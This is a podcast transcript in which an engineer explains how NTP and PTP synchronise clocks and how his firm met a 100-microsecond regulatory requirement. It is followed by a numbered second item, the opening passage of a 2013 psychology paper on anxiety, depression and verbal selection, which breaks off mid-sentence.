Most people, you just kind of run whatever your distribution shipped as an NTP daemon. NTP stands for the Network Time Protocol, and it is a protocol that up until not that long ago, I just kind of assumed used some kind of magic, and it knows how to talk to some servers on the Internet or some local servers that you probably then having talking to servers on the Internet, and it synchronizes your clocks with those servers. It exchanges some packets, maybe it takes a little while, maybe a few minutes, maybe longer. You probably don’t understand exactly why, but eventually, your clocks are relatively in sync to within maybe tens, or so, of milliseconds. Can you give us a tour of how NTP actually works? Like I said, for a long time, I just kind of assumed it was magic and didn’t really think too hard about it, and then at some point, I got tasked, within Jane Street, to actually look at some of this stuff and try and meet some requirements that were a little bit harder than the sort of standard tens of milliseconds synchronization. So I actually went and just was like, “Okay. Well. How does NTP do this from first principles?” right? Like, let’s go read some of the papers from David Mills. Let’s just go see if we can actually reason this out ourselves. At the end of the day, it’s just four timestamps. There’s a lot more complicated stuff around it, but the sort of core of it is these four timestamps. Let’s say I’m the client, and you’re the server. First, I send you a packet, but before I do I write down a timestamp. When you receive that packet, you write down a timestamp. Then, you send me a reply, and before you do you write down a timestamp. Finally, when I receive that reply, I write down a timestamp. It may not seem that groundbreaking, but with just those four timestamps I can compute two important numbers, the offset, and the delay. The offset is how far my clock is off from yours, so if you think it’s 12 pm and I think it’s 12:05 pm then the offset would be five minutes. The delay is how long it took those packets to traverse the network. To compute those numbers you basically take a system of equations, and for me, an important aspect was actually writing down, with a piece of paper and a pencil, and solving these equations myself, was understanding that there’s a sort of huge assumption in this protocol, that the delay for that first packet, where I timestamped then you did, and the delay for the second packet, where you timestamped and then I did, the assumption is that those times are the same and if they’re not the same they introduce what’s called error, and that is a sort of very important aspect. That is an assumption that is made so that you can actually solve those equations to get the offset and the delay. Can you maybe explain what it is about the calculation that depends on the symmetry between the send time and the received time? Those delays are kind of what tie it together, right? You know that if the clocks were in sync you know that the timestamp that you took minus the timesstamp that I took should be equal to the delay of the packet to get to you, right? And vice versa. My timestamp, from the second one that I received, minus your timestamp should be equal to the delay that it took for the packet to get from you to me. And you’re like, “Well. What do I do with this information?” And you say, “What if I just assume that those two delays are equal?” and if I assume that those two delays are equal, then I can start rearranging the various pieces of the equation. And then that’s how you can actually solve for the delay and the offset. What’s the role of the two timestamps on the server-side? So, if you ask me what time it is, I write down when I receive it, and then I write down the time where I send it back. You could imagine a simpler protocol with just three timestamps. Then you just assume that that time that I wrote down happened in the middle of that interval, the interval between the time you sent the first method and received the second message. How do you know when in the middle is, right? There’s lots of vagaries that happen with operating systems like if you timestamp it on either end, as soon as you receive the packet you timestamp it, and then maybe you have to do some work, and then right before you send it back you timestamp it, and that’s sort of how you get closest to those differences I mentioned representing the actual network delay from one to the other. And I guess an extra assumption that you’re making here is that in that period between the first timestamp and the second timestamp you had better assume that the rate at which the clock is going forward is about right. I think that throws another error term into the equation. It’s, I think, typically extremely small, right? If you just, it certainly seems like something you can, in practice, ignore. Because if you just look at the number of parts per million, or whatever that you were talking about, in terms of how much drift there is in a real computer clock, I think that is, in fact, pretty tiny. Right, well you’ve got the correction being applied by the time daemon that’s running on the computer, which is keeping the clock in sync. Presumably, the server-side of this communication is also taking time from somewhere either reference clock or some sort of higher upstream stratum in NTP, like clocks that are better than it, something like a GPS receiver, and it has applied a sort of correction to the operating system to say, “Hey, I currently believe that the frequency is off by this much. Please correct that when you hand me back time.” So, I feel like your biggest – I guess to your point of being able to ignore in practice – your biggest concern would be if in between those two timestamps something massive changed, like the temperature rose or dropped by many, many degrees or something such that, that frequency correction was now just wildly incorrect. Okay, so we have now a network protocol. Put a timestamp, send a message, another timestamp, another timestamp, you get it back. Now the computer that started all this has some estimate for how much it’s clock is off. What does it do then? In the simple world, you could just set your time. You could just, you could just sort of say like, “And the time should be X,” but that’s not generally how most Network Time Protocol daemons work. What they’ll do is they’ll take a number of samples from a single server, but many times you have multiple servers configured so you’ll take many samples from multiple servers, and you’ll sort of apply different criteria to these things to decide if you should even consider them. I think the reference implementation of NTPD has this notion of a “popcorn spike,” where if your offset, you know, if you’ve gotten back 30 samples and they all kind of look about the same, but then you get one that’s wildly off, you just kind of say like, “I’m gonna ignore that one, because likely that was just due to some crazy queueing somewhere in the network or something like that.” You can sort of think of this as a kind of voting algorithm: You have a bunch of different oracles that are telling you things about what time is, you kind of bring them all together and have some way of computing an aggregate assumption about what the time currently is that tries to be robust to errors and drop outliers and the like. Yeah, I think that’s right. You try to pick out the people who are lying to you, right? Some of those servers you might be talking to upstream might just be telling you incorrect things. They’re generally referred to in sort of NTP parlance as falsetickers, and the ones who are not falsetickers are truechimers. I’m not sure why exactly these are the names, but these are some of the names you might see if you’re looking around the internet. So you try and pick out the ones that are telling you the truth. You apply some other various heuristics to them to try and figure out which ones you think are the best, right? Which ones maybe have the smallest error bars – even though you might think that these are decent sources to use some of them might have wider error bars than others, right, like your samples may represent a sort of wider range than the other ones – so you try and figure out which ones are the best and then you use that to sort of tell your operating system to effectively speed up or slow down its frequency correction for how off it is, and try and sort of remove that error over time. You don’t just abruptly adjust the time that the system thinks it is. Most time daemons will not aggressively step the clock. The reason for that is that most applications do not enjoy when the time just changes drastically, especially not when it changes drastically in the negative direction. This highlights another property you want out of your clocks, which we haven’t touched on yet, which is: we said we want our clocks to be accurate. Your criterion for what it means for them to be right is you go to them and ask them what time it is, and they give numbers pretty close to each other. But there’s another property you want, which is you want the clocks to, in a micro sense, advance about a second per second and you especially want it to never go backwards, because there are lots of algorithms on a computer, which are making the assumption implicitly and you know, naively reasonably, that the clocks only go forward, and lots of things can get screwed up when you allow clocks to jump backwards. Right. So, a way that you can maintain that property that you just mentioned, while still correcting, is simply effectively tell the operating system like “Hey, slow down. I want to have time slow down effectively such that like this error gets removed, but I don’t have to actually step time backwards and make applications sad.” And I actually remember this, personally, from many years ago where the one place where I really intersected with clock synchronization in a serious way was, I was asked to look at Jane Street’s clock synchronization on its Windows machines. I wrote a small program that sent little NTP packets to the Windows machines, which knew the NTP protocol and responded appropriately. And they had the four timestamps on them, and instead of trying to compute the average I actually computed upper and lower bounds on how far the clock sync was off and generated a little graph to see what was going on. And I remember being quite surprised to discover that if you graphed how far off the clocks were you’d see this weird sawtooth behavior where the clocks would go out of sync, and then, bang, they would be in sync again, and then slowly out of sync and then in sync again. And that’s because the Windows NTP daemon we were running was configured to just smash the clock to the correct value and not do any of the kind of adjusting of the rate, which I think if I remember correctly, that’s called slewing, which is, I think, a term I’ve heard in no other context. Okay, so NTP lets you, in fact, do the slewing in an appropriate way so you can keep the rates pretty close to the real-time rates, but still, over time, slowly converge things back if they are far apart. In practice, how quickly can NTP bring clocks that are desynchronized back together? At least with some of the newer time daemons… so I don’t know what the default is for the reference implementation. I know with some of the newer daemons like chrony, the default is that it takes 12 seconds to remove one second of error. So depending on how far away you were you can sort of like work it out, right, 12 seconds to remove one second. So if you were a day, it’d be 86,400 times 12, which is a lot of seconds. So that’s actually quite fast, which means the rate at which the clock moves forward can be off by on the order of 10%, which is pretty aggressively pushing on the gas there. And these knobs are adjustable. If you really want to you can sort of change the max rate at which they will attempt to make these adjustments. So, we had clock synchronization working on our systems before you started in 2012, and yet you needed to redo it. What were we doing, and why did we have to redo it? So, we did what I’m sure lots of people do. We discussed GPS appliances before – so we have some GPS appliances, which are bringing us accurate-ish time, and then we pointed a bunch of time servers at those GPS appliances using NTP, and we pointed a bunch of clients at those time servers, and we sort of dusted our hands off and said, “Ah, done.” There was no real requirements around what is the maximum error. Are we trying to maintain anything? If you look at any given time can you tell us how far off any given system is from, say, UTC? And so that served us fine for a while. The main motivation for some of the work that was done was a bunch of different financial regulations that happened in Europe, but one of them specifically had to do with time synchronization, and what it said was that you have to be able to show that your clocks are in sync with UTC to within 100 microseconds. So the 100 microsecond number was the big change. At first, when we first heard this requirement. It’s like, “Well. Maybe we’re good. We don’t actually know at the moment like maybe we’re just fine.” Okay, and so we looked at it, and were we just fine? No, definitely not. So it was, I think I said it before, but like most systems were like a couple hundred microseconds out, but the real problem, or one of the real problems, was that they sort of would bounce all over the place. Like sometimes they could be relatively tight, say 150 microseconds, but various things would happen on the system that could disturb them and knock them, say, four or 500 microseconds out of alignment. If a bunch of systems all start on a given computer at the same time, and they all start using the processors very aggressively, that’ll fundamentally change the heat profile of the system. As the heat profile changes the frequency will change and then the time daemon might have a harder time keeping the correct time, because the frequency is no longer what it was before, and it has to sort of figure it out as it goes. So, I started sort of investigating, “Okay, how can we solve this problem? Like what do we have to do,” and sort of just started looking into various different things. I didn’t know, at the beginning of all this, can we solve this problem with NTP? Is NTP capable of solving this problem or do we have to use some different, newer, better protocol? Because NTP has been around for a long time. I definitely did the dumb thing, right, and I went to Google and I said, “How do you meet MiFID II time compliance regulations,” or something along those lines, and probably many different sort of combinations of those words to try and find all the good articles. If you just do that, what you find out is that everyone tells you should be using PTP, which is the Precision Time Protocol. It’s a completely different protocol. And if you go read on the internet, you’ll see that it is capable of doing “better time synchronization” than NTP, but nobody really tends to give you reasons. Lots of people will say things like “NTP is good to milliseconds. PTP is good to microseconds,” but without any sort of information backing that. So if you just do that, you’re like, “Well. We should clearly just run PTP. No problem. Let’s just do that.” So I did a bunch of research trying to figure out is that a good idea? So the first thing I also wanted to understand was what is magic about PTP? What makes it so much better than NTP, such that you can say these things like NTP is good to milliseconds, PTP is good to microseconds. Where does the precision of the Precision Time Protocol come from? Exactly. And what I found actually surprised me to some extent. The protocol is a little different. The sort of who sends what messages when is a little bit different. It involves multicast, which is different. But at the end of the day, it’s those same four timestamps that are being used to do the calculation, which I found a bit surprising. I was sort of like, “Now, if it’s the same four timestamps, more or less, what is it about PTP that makes it much more accurate?” And what I was able to find is, I think it’s basically three things. One is that many, many hardware vendors support hardware timestamping with PTP – so your actual network cards, we sort of talked about the packet showing up at the network, it having to raise an interrupt, the CPU having to get involved to schedule the application, right. You do all this stuff and then eventually get a timestamp taken. PTP, with hardware timestamping, as soon as that packet arrives at the network interface card, it can record a timestamp for it, and then when it hands the packet up to the application it says, “Here’s our packet. Oh, and by the way, here’s the timestamp that came with it.” We were talking before about trying to move those timestamps as close as you could, such that they, actually the difference of them represented the delay from the client to the server and from the server to the client; so if you push them sort of down the stack to the hardware it means that you’re going to have much more accurate timestamps, and you’ll have a much better chance that those things are actually symmetric, meaning you’re taking good time. And it also removes a lot of the other uncertainty in taking those timestamps, such as scheduling delay, interrupt delay, other processes competing for CPU on the box, stuff like that, so that’s one thing. So, you have hardware timestamping as a PTP thing. Another thing is the frequency of updates. So I think by default PTP sends its sync messages to clients once every second, whereas, at least for the reference implementation of NTPD, I believe the lowest you can turn that knob for how often should I query my server is once every eight seconds, so you have the hardware timestamping, you have the frequency of updates. And then the other bit of it is the fact that lots of switches – so I think PTP was basically designed with the idea that you’d have all of the sort of network contributing to your time distribution, and so all of your switches can also get involved and help you move time across the network while understanding their own delays that they’re adding to it, and so they can kind of remove their own delays and help you move time accurately across the network. At least that’s the, that’s kind of the intent of PTP. The idea is, I guess, you can do in some sense, the moral equivalent of what NTP does with the two middle timestamps. Where there are two timestamps in NTP that come from the server that’s reporting time. It’s like when it receives and then when it sends out and you get to subtract out from the added noise that gap between those two timestamps, and then the idea is you can do this over and over again across the network, and so delays and noise are introduced by, for example, queueing on the switch, would go away. Like you would essentially know how much those delays were and as a result, you could potentially be much more accurate. Yeah. I think that’s roughly the conclusion I came to, that that’s what makes PTP more accurate than NTP, which was surprising to me. And then I did a bunch of research and was talking to various people in the industry, and at various conferences and stuff, and there was some agreement that you can make NTP also very accurate you just have to control some of these things, so there are… in addition to being able to do hardware timestamping with PTP packets some cards, these days, support the ability to hardware timestamp all the packets, and if your machine is just acting as an NTP server and most of the packets it receives are NTP packets, well then you’re effectively timestamping NTP packets. Some cards also will timestamp just NTP packets. They can sort of recognize them and timestamp only those, but it was sort of like “Okay if we have the right hardware, we can get the timestamping bit of it. That’s kind of an interesting thing. With the different NTPD implementation, chrony being the other implementation I’m talking about as opposed to the reference one, you can turn that knob for how frequently you should poll your server, I think as much as like 16 times a second. There’s a bit of like diminishing returns there, it’s not always better to go lower… point being, you can tune it to at least match sort of what PTP’s default of once a second. And the more I dug, and the more I talked to people, the more people told me, “Hey, you definitely do not want to involve your switches in your time distribution. If you can figure out a way to leave them out of it, you should do so.” I was happy to hear that in some ways, because right now the reliability. or the sort of, the responsibility of the time distribution kind of lies with one group, and that’s fine. When you then have this responsibility shared across multiple groups, right, it becomes a lot more complicated. Every switch upgrade, suddenly, you’re concerned. “Well, Is it possible that this new version of the firmware you’re putting on that version of that particular switch has a bug related to this PTP stuff and is causing problems?” Given all of that, I started to believe that it was possible that we could solve this problem of getting within 100 microseconds using NTP and I sort of set out to try and see if I could actually do that. It seems like in some sense, the design of PTP where it relies for its extra accuracy on these switches violates this old end-to-end property that people talk about as the design of the internet of trying to get as much of the functionalities you can around the edge of the system. And I think that is motivated by a lot of the kind of concerns you’re talking about: you have more control over the endpoints, and you want to rely on the fabric for as little as possible. I guess the other reason you want to rely on the fabric it’s not just that there are different groups, and like, “ Oh, it’s hard to work with people in different areas and coordinate.” It’s also in various ways, fundamentally harder to manage networks than it is to manage various other kinds of software, but the reality is, in many organizations, in many contexts, a lot of getting the network right involves an extremely good, extremely well trained, extraordinarily careful human being, just going in and changing the configs and not getting it wrong. It’s kind of a terrifying system, and the less complexity, you can ask the people who have to go in and do this terrifying thing of modifying the network, the less complexity you can ask them to take care of the better. I mean, that’s a very, very true point. And another aspect of it is having less black-box systems involved. So, chrony is an open-source project, we can sort of inspect the code and see what it’s doing and understand how it behaves. The GPS appliances are not but the idea of having less black-box systems where, “Hey, that’s really strange. Why did we see this spike? We have absolutely no idea.” The amount we can minimize that kind of stuff, the better. Right. The primary currency of the sysadmin is inspectability. You want to be able go in and figure out what the hell is happening. Yes. Huge proponent of things you can inspect and debug. You talked a bunch about hardware timestamping, and I have a kind of dumb and mechanical question about all this, which is you talked about essentially software processes keeping clocks up to date. You have this NTP daemon that knows how to adjust the rates of things and stuff, but then you talked about the NIC going in timestamping packets. So does the NIC have a hardware clock and the motherboard have a hardware clock, or the CPU? How are these clocks related to each other? What’s actually going on when you’re doing hardware timestamping? Yeah, the NIC also has a hardware clock. Is it a different time? Do you have to run NTP between the NIC and the host system? I think that would be challenging, but like yes, you can use a thing from the Linux PTP project to move time from a network card to the system. It’s called phc2sys. That’s just a thing you can do, You have time on your network cards, you can move that time to the system, you can move it from the system to another network card, you can kind of shift this time around in various ways. But yes, the cards themselves do also have a clock on them that you’re also keeping in sync. So another thing you mentioned about PTP is that it uses multicast. So, I’ve had the chance to sit down and talk at length with Brian Nigito, in a previous episode of this podcast, about multicast, and I’m curious what role multicast plays here in the context of PTP? The whole idea is that at the sort of root of this time distribution tree you have what’s known as a grandmaster, and you can have multiple grandmasters, and a grandmaster is just something that doesn’t need to be getting PTP, time from PTP. It’s like you know the GPS reference or something else. You have this grandmaster you can have multiple ones. There’s a thing called the best master clock algorithm for the participants of PTP to determine which of them is the best one to act as the grandmaster at any given time, and then the idea is that you multicast out these packets to say, “Here’s my first timestamp,” and it just makes it easier on the network. As a PTP client, you just have to come on and start listening for these multicast messages and then you can start receiving time, as opposed to you having to actually reach out and be configured to go talk to the server. You can just sort of have less configuration and start receiving these time updates from the grandmaster. Got it. So you think it’s mostly a kind of zero-configuration kind of story. It also makes it easier for the grandmaster. You don’t have to maintain these connections. You don’t have to have all these sockets open. You just sort of have like one socket there kind of multicasting out. It’s not 100% true, because there’s a delay request and a delay response message that’s involved in all this too. And it’s also actually kind of strange… I think this was recently changed in the most recent version of PTP, but technically the way it works is the grandmaster sends this multicast message that is a synchronization message which contains one of those timestamps. When the client receives it, it actually sends a multicast message back that says, “Hey, I’d like a delay request,” and then when the grandmaster receives that it sends out another multicast message that says, “Here’s the delay response,” which is kind of insane when you think about it, right, because you’re, you’re involving all of these other potential peers that are listening in on the network with your exchange, and you can configure some of these open-source projects – like the Linux PTP project, which uses a daemon called ptp4l – you can configure it to do a hybrid model where it receives the sync message as a multicast message, but then since it knows where that message came from it just does a unicast delay request and then delay response, which makes a lot more sense. Yeah, the base behavior you’re describing sounds pathological, right? Essentially, quadratic. You get…. Everyone sends a message to everyone. That is not usually a recipe for good algorithmic complexity. I’m not sure why it was designed that way. It could be that the original people were sort of thinking that you’d have these smaller domains where you have these boundary clocks. Or sort of you’re multicasting… you’re sort of limited to how many people you’re talking to. But I kind of agree the default behavior seems a little crazy to me, and that’s why in our case, where we are using PTP (we’re using it in a small area of the world) we have it configured to do that hybrid thing where the actual sync message comes in multicast, but the delay request and the delay response wind up being unicast. There’s a major thing that I haven’t touched on here, which is that NTP, I mentioned it before you have multiple servers, and you kind of have this built-in notion of redundancy, right, where you’re sort of comparing all the times from the different servers, and you’re trying to figure out which of them are falsetickers, right, and so if any of them misbehave, the protocol kind of has this built-in notion of trying to call them out and ignore them. With PTP, we’re talking about the single grandmaster, that would be a GPS appliance, and unfortunately, we have found black box GPS appliances to be less than ideal. It would be fine, if you’re just talking about a straight failure scenario, right? We have a GPS appliance, maybe we have two of them, they have agreed amongst themselves who is the grandmaster. One of them goes offline, the other one notices that, it picks up, starts broadcasting. That would be a perfectly fine world and I wouldn’t be too concerned about it, but the thing that we’ve seen happen is we want to perform maintenance on a GPS appliance because its compact flash card is running out of life and we need to actually replace that. When you go to shut it down, it happens to send out a PTP packet that is like complete crazy pants, like just absolutely bonkers. It makes no sense whatsoever. The timestamp is off the charts. And we’ve had GPS appliances do things like that, and so part of my thinking through this was, you know, “Geez, at the end of the day I really don’t want to be pulled back to a single GPS appliance that is providing time to potentially large swathes of the network,” because if it goes crazy there’s no real provisions in PTP for finding the crazy person everybody will just follow those crazy timestamps wherever they lead. At least for a while. It sounds like there’s a way of eventually deciding someone else is the right one to pay attention to, but it means for short periods of time you may end up just listening to the wrong guy. I’m not an expert in exactly what’s involved in the best master clock algorithm, but I thought what was in the best master clock algorithm was simply about how good your clock was, and so if you were sitting there saying, “I have the best clock. It’s fantastic.” but then you’re telling people the completely wrong time because you had some kind of a bug or misconfiguration, you would continue to operate in that mode indefinitely. That’s fascinating. What it sounds like is despite the fact that PTP is newer, and, in some ways, shinier, and in some ways having fundamentally better capabilities for some aspect of what it’s doing, it also just threw out a bunch of the careful engineering that had gone into NTP over a long period, because NTP has significantly more robust ways of combining clocks than what you’re describing for PTP. Yes, that was my kind of interpretation of looking at all this stuff: it feels like we threw out a lot of the safety, and that makes me super nervous based on my experience with these devices. So here we are, we have an NTP solution that’s not working well enough, and a PTP solution that’s kind of terrifying. So, where’d you go from there? So, we’re trying to build a proof of concept. At the end of the day, we sort of figured, “All right. We have these GPS appliances.” We talked about hardware timestamping before on the GPS appliances, and how they can’t hardware timestamp the NTP packets, so that’s problematic. We thought, “How can we move time from the GPS appliances off into the rest of the network?” And so we decided that we could use PTP to move time from the GPS appliances to a set of Linux machines, and then on those Linux machines we could leverage things, like hardware timestamping, and the NTP interleaved mode to move the time from those machines onto machines further downstream. The NTP interleaved mode, just to give a short overview of what that means… when you send a packet if you get it hardware timestamps on transmission the way you use that hardware timestamp is you get it kind of looped back to you as an application. So I transmit a packet, I get that hardware timestamp after the packet’s already gone out the door. That’s not super useful from an NTP point of view, because really you wanted the other side to receive that hardware timestamp, and so the interleaved mode is sort of a special way in which you can run NTP and that when you transmit your next NTP packet you send that hardware timestamp that you got for the previous transmission, and then the other side, each side can use those. I don’t want to get into too much of the details of how that works, but it allows you to get more accuracy and to leverage those hardware timestamps on transmission. I see. And this was already built into existing NTP clients, this ability to take advantage of hardware timestamps by moving them to the next interaction. That’s not a thing you had to invent. Nope, it’s existed for a while, and it, I think given with the reference NTP implementation it can leverage timestamps taken at the driver level to do something similar, but chrony adds the ability to actually leverage hardware timestamps in the same fashion, sort of sending them in the next message so that they can calculate a more accurate difference. Because hardware timestamps are a relatively new invention of all of this, right? When NTP was designed I don’t think there was any devices that did hardware timestamping. I think that is true, and as I was saying before, when this all first came to fruition the things that supported hardware timestamping were PTP specific. Okay, so now you have an infrastructure where there’s a bunch of GPS devices, a layer of Linux servers, which get time via PTP from those GPS devices, and then act as NTP servers for the rest of the network. So maybe I missed, why does that first layer have to use PTP rather than NTP? The major reason is that the GPS appliances… its apropos to what we were just talking about… The GPS appliances will hardware timestamp their PTP because they have dedicated cards for it, but they don’t hardware timestamp their NTP, so the quality of time that you’re getting off of the GPSes if you’re talking NTP to them – like, if you just remove the time servers and you have the clients talk directly to the GPS appliances, for example – it’s just going to be a lot lower quality. And to be honest, I don’t know if they support the interleaved mode of NTP, like it’s not something I ever really dug into. It sort of goes back to that black box thing of like, “Well, we can configure this thing in such a way that it spits out hardware timestamped PTP and be relatively confident that it’s doing that job.” But anything more esoteric gets a little dicey. Got it. And you solve the false ticker problem by basically having each Linux server that’s acting as a kind of NTP… marrying each one of those to an individual GPS device. So if that GPS device is crazy then the Linux server will say crazy things, but then things internally on the network are going to, in a fault-tolerant way, combine together multiple of these Linux servers and be able to use the high accuracy way of getting data from those servers. That’s exactly right. We constrain the servers that any given client can pick using various sort of knobs within chrony because we want to meet certain requirements, and so we would like to ensure that any given client is going to talk to his local NTP server as opposed to one that is, say, 600 microseconds away somewhere, because as soon as you go to talk to that one that’s 600 microseconds away, you introduce a lot of potential error. And so what we do is we force the NTP clients to talk to their local servers, and then we also configure them to talk to a bunch of other servers, which are sort of too far away to get very high accurate time, but we use them just as you described, to sort of call out and figure out if either of the two local ones have gone crazy. If both of the two local ones have gone crazy. Well, we’re kind of out of luck. How well did this all work in practice? It worked surprisingly well. So sort of designing the system coming up with a system that can do this stuff and remain fault-tolerant and all that is one thing, but then there’s also the other thing of show me, right, like show me that you’re within 100 microseconds of UTC. So that required understanding like, what are the errors? And that comes back to the sort of asymmetry question and understanding things like if the NTP daemon is not accepting updates from its server for whatever reason because maybe it thinks the server is crazy, or because it thinks that the samples it just took are incorrect like maybe you had a popcorn spike or something like that, it’ll do a thing where it’ll basically increment a number that represents its uncertainty about how much it might be drifting while not getting good updates from its server, and so you kind of have to add together all these different errors. You have that one, you have the known error introduced by the actual time daemon, the time daemon… what it knows how far off it is, and then you have that round-trip time divided by two that I mentioned. So if you take all that, added together, you kind of have to do a similar thing for the PTP segment I mentioned, and then you kind of have to add on the 100 nanoseconds for the GPS that I mentioned. If you can add all that together, most of our servers, we can show that we are absolutely no worse error than about 35 microseconds, most of the time, assuming not some extenuating circumstances. So a design choice we made in this whole thing was your best bet for getting good time to clients is to have a dedicated network for it. Dedicated NIC, dedicated network, have it be quiet, nice, you know, no interference, but that’s expensive and annoying, and nobody really wants to do that. It’s expensive in a few ways. It’s expensive in the physical hardware, you have to provision, but it’s also just expensive in the net complexity of the network, right? I think there’s a lot of reasons why we want to try and keep the network simple and having a whole separate network just sounds like a disaster from a management perspective. Agreed. Right. So I was like, “I really don’t want to go down that road.” So we sort of said, “Well. Let’s see what happens.” And so I was just saying, most of the time we can attest that we are better than 35 microseconds, you know, 35 mics of error worst case, but there are situations where you can cause that to fall over. You can… for example, we have some clients that don’t support hardware timestamping. They’re just older generation servers, they don’t have NICs with hardware timestamping. If on those things, you just saturate the NIC for five minutes solid you’re probably going to get your error bounds outside of 100 mics, just going to happen. But on newer machines that do support hardware timestamping you can do things like that, and still stay within 50 mics of UTC, which is pretty cool. Some of this is built upon the fact that we know we have a very smart networking team, we’re confident in the ship that they run and the way our networks are built in that kind of stuff that lends something to the not wanting to build a dedicated time network, and we think we can get by without it. And so that’s sort of where we ended up around 35 mics. I want to say it’s 35 to 40 mics for systems that don’t have hardware timestamping on the client-side, and closer to 20 mics for systems that do have hardware timestamping on the client-side. And as I mentioned, the systems that do have hardware timestamping on the client side are kind of more robust to problems, to just things that people might do. You know, maybe somebody’s debugging something and they want to pull a 10 gigabyte core dump off of a machine. They’re not thinking about the timestamping on the machine right now like they’re focused on their job to try and actually figure what happened with that system. So the other aspect of all this was reporting on it and showing it. How do we surveil to show that we are actually in compliance? And so for that, we took what we think is a relatively reasonable approach, which is: we sample. And so there’s kind of no interval at which you can sample which is small enough if you want to be absolutely sure that all the time you were never out of compliance, right? You could say, “Well. What’s a reasonable sample? Every five seconds? No, that’s definitely too much. Okay, every one second? Maybe that’s fine. Every hundred milliseconds,” right, so where do you stop? So we sort of decided that for machines that go out of compliance it is likely that if we sampled every 10 seconds, we would pick them up because it’s not like there’s these crazy perverse spikes that sort of jump in there and then disappear. It is more like somebody’s SCPing a large file across the network, or something is misconfigured somewhere, and then therefore it is a sort of persistent state that sticks around for a while. So we sample every 10 seconds, pulling out these sort of various stats I mentioned about what represents the total error, and then we pump that into effectively a big database all day long, and then at various times throughout the day, we surveil that database and look for any systems that are not sort of meeting their time obligations. We hold different systems to different levels of accuracy. So after all of this, not that I want to call this into existence, but imagine that there’s a new version of European regulations, MiFID III comes out and says, “Now you have to be within 10 microseconds.” Assuming that technology is still as it is now what would you have to do to get the next order of magnitude in precision? Not this. So I think probably you’d want to go to something like PTP, but probably not just PTP directly. There’s a thing called White Rabbit, which is kind of like some PTP extensions, basically. I think it might actually be completely formalized in the most recent PTP specification. But that is a combination of roughly PTP with synchronous ethernet. So synchronous Ethernet allows you to get syntonization across the network, so you can sort of make sure that the frequencies are the same. Can I ask you what the word syntonization means? It just basically means that those two, the frequencies are in sync. So it doesn’t mean that we have the same time, but it means that we are sort of advancing at the same rate. I see. So there are techniques, essentially, that let you get the rate the same without necessarily getting the clocks in sync first. Correct. And is my understanding that White Rabbit sort of uses this idea that you can have the rates the same, with PTP, to work out some additional constraints that they can solve and get sub-nanosecond time synchronization. I think we would have to put a lot more thought into the sort of reliability and redundancy story. I sort of discounted PTP because it didn’t necessarily have the best reliability/redundancy story. It’s not to say we couldn’t have figured out a way to make it work for us. We almost certainly could’ve. You could have two grandmasters, one sitting there as the primary doing its normal operation, one sitting there as a standby, and if the primary one goes crazy for some reason you, could have some automated tooling or something that an operator could use to take it out of service, and bring the secondary into service and only have maybe a minor service disruption. I can imagine us doing that work but given the problem, we were trying to solve it seemed not necessary. We can solve this problem using this existing technology, but I do think if we had to go much lower like you said an order of magnitude lower, we’d have to start looking at something else. Well. Thank you, so much. This has been really fun. I’ve really enjoyed learning about how the whole wild world of clock synchronization is knit together. Well. Thank you, very much. It was a pleasure being here. It’s a pleasure talking about these things. It’s fun to try and solve these interesting, challenging problems. You can find links related to the topics that Chris and I discussed, as well as a full transcript and glossary at signalsandthreads.com. Thanks for joining us, and see you next week.
2
Opposite effects of anxiety and depressive symptoms on executive function (2013)
Author manuscript; available in PMC 2015 Aug 1. Cogn Emot. Published in final edited form as: Cogn Emot. 2014 Aug; 28(5): 893–902. Published online 2013 Dec 3. p 10.1080/02699931.2013.859568 PMCID: PMC4020950 NIHMSID: NIHMS537913 PMID: 24295077 Opposite effects of anxiety and depressive symptoms on executive function: The case of selecting among competing options Author information Copyright and License information Disclaimer Abstract People constantly face the need to choose one option from among many, such as when selecting words to express a thought. Selecting between many options can be difficult for anyone, and can feel overwhelming for individuals with elevated anxiety. The current study demonstrates that anxiety is associated with impaired selection across three different verbal tasks, and tests the specificity of this finding to anxiety. Anxiety and depression frequently co-occur; thus, it might be assumed that they would demonstrate similar associations with selection, although they also have distinct profiles of symptoms, neuroanatomy, and neurochemistry. Here, we report for the first time that anxiety and depressive symptoms counterintuitively have opposite effects on selection among competing options. Specifically, whereas anxiety symptoms are associated with impairments in verbal selection, depressive symptoms are associated with better selection performance. Implications for understanding the mechanisms of anxiety, depression, and selection are discussed. Keywords: executive function, selection, anxiety, depression One of the defining human characteristics is that we can engage executive functions to respond to a given environmental context in a wide variety of ways, rather than being tied to habitual responses. This ability allows us to engage in an almost infinite repertoire of behaviors. This capacity for generativity (the ability to produce an infinite number of variety of responses) has long been considered definitional for the most human behavior of all: language. But like all cognitive abilities, it comes at a cost: with the capacity to generate infinite options comes the difficulty of choosing among them. We constantly face the need to choose one option from among many, such as when we select words to express a thought. For example, when constructing a sentence, a speaker must not only choose the intended message but must also select among multiple words that are all compatible with the intended message. People are slowed, and prefrontal executive function areas are engaged, when selection demands are high, that is, when there is competition between multiple automatically activated representations, which must be resolved in order for the speaker to select a single response for output (e.g., Snyder & Munakata, 2008; Snyder et al., 2010). Selecting between many options can be difficult for anyone, and can feel overwhelming for individuals with elevated anxiety. People with anxiety disorders find coping with too many options particularly difficult, and struggle with making decisions, indecisiveness, and intolerance of uncertainty (e.g., Rassin, Muris, Franken, Smit, & Wong, 2007). Whereas decision-making deficits in persons with anxiety have previously been shown in complex or affective tasks (e.g., Rassin et al., 2007), the selection deficits that lie at the core of these problems are observed even in a simple language-production task (Snyder et al., 2010). To explain these and other findings, we have developed a unified, biologically-plausible model of selection among competing options (Snyder et al., 2010). Our model demonstrates how competitive, inhibitory dynamics among neurons in prefrontal cortical networks can support selection between alternatives. Specifically, these competitive dynamics serve to sharpen cognitive representations by amplifying activity in the most active, task-relevant, representations (e.g., the most appropriate word to complete a sentence) and by suppressing competing representations (e.g., for the many other word possibilities; Snyder et al., 2010). Our model demonstrates how reduced inhibitory (i.e., GABAergic) function can lead to reduced competitive dynamics in prefrontal cortical networks, allowing non-winning competitors (alternative responses that are not selected) to become more active and to compete over a longer period, which impairs selection. As predicted by this model, (a) the GABA agonist midazolam improved selection; and (b) greater anxiety, which has been linked to reduced GABAergic function, was associated with more difficulty selecting between competing word options and reduced activation in prefrontal executive function areas during such selection (Snyder et al., 2010). However, an important question remains as to whether deficits in selection are uniquely related to anxiety, or could be affected by other forms of co-occurring psychopathology. Specifically, anxiety and depression are highly correlated at the symptom level (e.g., Stöber & Joormann, 2001), and frequently comorbid at the disorder level; approximately 60% of individuals with major depressive disorder also have an anxiety disorder (e.g., for review see Rivas-Vasques et al., 2004). Anxiety and depression can begin before, concurrently, or after one another, and often recur throughout the lifespan (Moffitt et 